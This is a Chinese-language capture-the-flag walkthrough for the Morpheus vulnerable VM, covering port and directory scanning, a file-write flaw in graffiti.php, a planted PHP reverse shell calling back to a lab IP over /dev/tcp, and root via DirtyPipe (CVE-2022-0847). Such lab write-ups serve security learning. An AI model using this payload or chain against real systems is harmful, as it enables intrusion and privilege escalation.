matrix-breakout-2-morpheus靶场

知识点

• SecLists字典
• gobuster工具
• php 文件写入
• PEASS-ng辅助提权工具
• CVE-2022-0847

开放端口

22/tcp open  ssh     OpenSSH 8.4p1 Debian 5 (protocol 2.0)
| ssh-hostkey: 
|_  256 aa83c351786170e5b7469f07c4ba31e4 (ECDSA)

80/tcp open  http    Apache httpd 2.4.51 ((Debian))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Morpheus:1
|_http-server-header: Apache/2.4.51 (Debian)

81/tcp open  http    nginx 1.18.0

目录扫描

gobuster工具配合 SecLists字典大全

gobuster.exe dir -w directory-list-2.3-medium.txt -x php,txt -u http://192.168.78.154/

/index.php            (Status: 200) [Size: 6]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.78.154/javascript/]
/robots.txt           (Status: 200) [Size: 47]
/graffiti.php         (Status: 200) [Size: 468]
/graffiti.txt         (Status: 200) [Size: 142]

访问/graffiti.php 文件

在post请求包中 file参数，有可能存在文件读取漏洞，将graffiti.txt 改为php看看，发现可以读取文件

代码审计

graffiti.php 当post参数message不为空时，写入文件名和内容

<?php

$file="graffiti.txt";
if($_SERVER['REQUEST_METHOD'] == 'POST') {
    if (isset($_POST['file'])) {
       $file=$_POST['file'];
    }
    if (isset($_POST['message'])) {
        $handle = fopen($file, 'a+') or die('Cannot open file: ' . $file);
        fwrite($handle, $_POST['message']);
	fwrite($handle, "\n");
        fclose($file); 
    }
}

// Display file
$handle = fopen($file,"r");
while (!feof($handle)) {
  echo fgets($handle);
  echo "<br>\n";
}
fclose($handle);
?>

写入php文件

写入webshell

通过反弹shell

写入php文件

<?php exec("/bin/bash -c 'bash -i >/dev/tcp/192.168.78.152/1234 0>&1'"); ?>

提权

PEASS-ng辅助提权工具

扫描出来提权的CVE漏洞

DirtyPipe CVE-2022-0847

成功提权root